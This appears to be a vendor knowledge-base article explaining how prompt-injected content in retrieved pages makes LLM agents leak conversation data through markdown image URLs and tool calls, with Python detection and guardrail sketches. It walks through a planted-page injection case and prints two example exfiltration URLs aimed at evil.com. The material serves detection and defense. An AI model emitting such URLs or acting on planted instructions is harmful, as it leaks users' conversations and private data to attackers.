Failure Modes

What Is a Script Injection Data Privacy Attack?

A script injection data privacy attack is a class of LLM exploit where attacker-supplied content embeds executable scripts (HTML, JavaScript, SQL, shell, JSON-flavored payloads) that the application or a downstream tool runs, leaking private data such as conversation history, retrieved documents, system prompts, or user PII. It is the intersection of script injection and data exfiltration: the attacker doesn’t just hijack the model; they use the hijack to leak data. In production agent stacks, it surfaces as PII matches in tool arguments, unexpected outbound HTTP calls, and markdown that ships scripts to a renderer. FutureAGI detects it with PromptInjection, ProtectFlash, and PII.

Why It Matters in Production LLM and Agent Systems

The attack is dangerous because it exploits the seams between components — the model, the tool layer, and the renderer. The LLM may behave as instructed, but the script payload it produces gets executed downstream. A common pattern: an attacker writes a comment on a public page that the model retrieves; the comment includes a markdown image whose src is https://evil.com/log?data={conversation}. The renderer makes the request, leaking the conversation to the attacker server.
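
To make the exfiltration channel concrete, here is a minimal sketch, using only the Python standard library, that flags markdown images and links whose URLs carry query strings toward hosts outside an allow-list; ALLOWED_HOSTS and suspicious_markdown_urls are illustrative names, not part of any FutureAGI API.

import re
from urllib.parse import urlparse

# Placeholder allow-list of hosts the renderer may legitimately fetch from.
ALLOWED_HOSTS = {"cdn.example.com", "docs.example.com"}

# Matches markdown images ![alt](url) and links [text](url).
MD_URL = re.compile(r"!?\[[^\]]*\]\((?P<url>[^)\s]+)\)")

def suspicious_markdown_urls(text: str) -> list[str]:
    """Return URLs a renderer would fetch that look like exfiltration paths."""
    hits = []
    for match in MD_URL.finditer(text):
        parsed = urlparse(match.group("url"))
        # A query string aimed at an unfamiliar host is the classic exfiltration shape.
        if parsed.query and parsed.hostname not in ALLOWED_HOSTS:
            hits.append(match.group("url"))
    return hits

Run it on retrieved context and on final outputs: in retrieved content a hit is the planted payload, in the output it is the payload about to reach the renderer.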

Engineers feel this when a “harmless” model output triggers an outbound request from a frontend or a SQL exception in a downstream service. SREs see anomalous egress traffic and spike alerts on tool-call argument size. Compliance leads need evidence that PII never left the boundary; without trace-level evaluator scores, they cannot prove it. Product teams discover the issue when a customer reports their conversation appearing in a third-party log.

In 2026 agent stacks, the attack surface is large. The retriever pulls in malicious context; the tool executor renders or executes the payload; the synthesis model passes scripts through to the user. Useful production symptoms: spikes in PromptInjection score on input or retrieved context, PII matches in tool arguments (especially URL parameters), unusual markdown patterns in outputs (image and link tags with query strings), and a sudden rise in outbound DNS resolutions to unfamiliar domains.
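
The tool-argument symptom can be screened with a similar standard-library sketch, assuming tool arguments arrive as a dict of name to string value; the email regex and the length cutoff are crude illustrative heuristics, not the PII evaluator itself.

import re
from urllib.parse import urlparse, parse_qsl

EMAIL = re.compile(r"[^@\s]+@[^@\s]+\.[^@\s]+")

def flag_url_arguments(tool_args: dict[str, str]) -> list[tuple[str, str]]:
    """Flag tool arguments whose URL query parameters look like smuggled data."""
    flagged = []
    for name, value in tool_args.items():
        parsed = urlparse(str(value))
        if not parsed.scheme.startswith("http"):
            continue
        for key, qval in parse_qsl(parsed.query):
            # Email-shaped or very long opaque values in a query string are the
            # typical shape of context being pushed out through a tool call.
            if EMAIL.search(qval) or len(qval) > 200:
                flagged.append((name, f"{key}={qval[:40]}"))
    return flagged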

How FutureAGI Handles Script Injection Data Privacy Attacks

FutureAGI’s approach is to layer detection at each seam where script injection can hide. At the input edge, PromptInjection and the lighter-weight ProtectFlash score user input and retrieved context for injection patterns. At the output edge, PII evaluators check the response and every tool argument for regulated data, including URL parameters that look like exfiltration paths. At runtime, Agent Command Center places a pre-guardrail to strip suspicious markdown, scripts, and HTML, and a post-guardrail to redact PII and validate URL schemes before the response reaches the user or the renderer.
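
What the post-guardrail does at that last seam can be sketched roughly as follows; ALLOWED_SCHEMES, ALLOWED_HOSTS, and neutralize_urls are hypothetical names standing in for guardrail configuration, not the Agent Command Center API.

import re
from urllib.parse import urlparse

ALLOWED_SCHEMES = {"https"}
ALLOWED_HOSTS = {"cdn.example.com", "docs.example.com"}  # placeholder allow-list
URL_PATTERN = re.compile(r"""https?://[^\s)"']+""")

def scheme_and_host_ok(url: str) -> bool:
    parsed = urlparse(url)
    return parsed.scheme in ALLOWED_SCHEMES and parsed.hostname in ALLOWED_HOSTS

def neutralize_urls(response_text: str) -> str:
    """Rewrite any disallowed URL so the renderer has nothing left to fetch."""
    return URL_PATTERN.sub(
        lambda m: m.group(0) if scheme_and_host_ok(m.group(0)) else "[blocked-url]",
        response_text,
    )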

A concrete example: a research-assistant agent retrieves web pages via a search tool and synthesizes an answer. An attacker plants a page with markdown like ![logo](https://evil.com/log?d={prompt}). With traceAI-langchain instrumented, the retriever step writes a span containing the retrieved content. PromptInjection runs on the retrieved content; if the score crosses the threshold, the response is rewritten and the trace is flagged. The post-guardrail validates URL schemes against an allow-list before the response reaches the markdown renderer. PII runs on the final response; any leaked context shows up in the score and the trace.

Unlike a single Lakera-style filter that runs once on user input, FutureAGI’s layered evaluators run on inputs, retrieved context, tool arguments, and final outputs. The trace evidence shows exactly where the attack landed, so the engineer can patch the right seam. The next action is operational: tighten the guardrail, add the trace to a regression set, and switch the renderer to a sandboxed mode if it is the leak path.

How to Measure or Detect It

Detection works best as multiple signals reading the same trace:

  • PromptInjection score on inputs and retrieved context — alert when score crosses a baseline; investigate retrieval source if it is the elevated step.
  • ProtectFlash lightweight pre-guardrail rate — high block rate indicates active probing; correlate with PromptInjection scores.
  • PII matches in tool arguments — any match in a URL or HTTP body argument is a red alert; never tolerate even one.
  • Egress signals — unfamiliar outbound domains in tool calls; unusual query-string lengths.
  • Markdown and HTML pattern checks — image, link, script tags with attacker-controlled query strings.
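
A minimal wiring sketch, assuming user_input, retrieved_text, response, and tool_args have already been pulled off the trace:
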
from fi.evals import PromptInjection, PII

# Instantiate the evaluators once and reuse them across traces.
inj = PromptInjection()
pii = PII()

# Score the user input and the retrieved context for injection patterns.
inj_result = inj.evaluate(input=user_input, retrieved=retrieved_text)

# Check the final response and every tool argument for regulated data.
pii_result = pii.evaluate(input=user_input, output=response, tool_args=tool_args)

If the trace lacks per-step scores, the attacker can hide between steps; instrument every seam.

Common Mistakes

  • Filtering only the user input. The attack lives in retrieved content; check inputs, retrieved context, and tool arguments.
  • Trusting markdown renderers. A renderer that fetches images is an exfiltration channel; sandbox or validate URL schemes.
  • No egress allow-list. Without an allow-list, any URL the model produces is a potential data path; a minimal gate is sketched after this list.
  • Confusing it with classic XSS. XSS targets browser execution; this attack targets the AI pipeline’s data path.
  • Running PII checks only on the final response. The leak often happens in tool arguments before the response is produced — check every step.
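
A minimal sketch of that egress gate at the tool executor, with EGRESS_ALLOW_LIST and guard_tool_url as illustrative names rather than a FutureAGI API:

from urllib.parse import urlparse

# Illustrative egress allow-list for the HTTP tool executor.
EGRESS_ALLOW_LIST = {"api.internal.example.com", "search.example.com"}

def guard_tool_url(url: str) -> str:
    """Refuse to execute an HTTP tool call whose destination is not allow-listed."""
    host = urlparse(url).hostname
    if host not in EGRESS_ALLOW_LIST:
        raise ValueError(f"Blocked egress to non-allow-listed host: {host}")
    return url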

Frequently Asked Questions

What is a script injection data privacy attack?

It is an LLM exploit class where attacker-supplied content embeds executable scripts that the application or a downstream tool runs, leaking private data such as conversation history, retrieved documents, system prompts, or user PII.

How is it different from prompt injection?

Prompt injection manipulates the model's behavior by overriding its instructions. Script injection data privacy attacks aim specifically at data exfiltration by smuggling executable payloads — HTML, JavaScript, SQL, JSON — that downstream tools or renderers execute.

How do you detect a script injection data privacy attack?

FutureAGI runs PromptInjection and ProtectFlash for input filtering, plus PII evaluators on outputs and tool arguments. Egress monitoring on outbound URLs and unexpected schema fields complements the eval layer.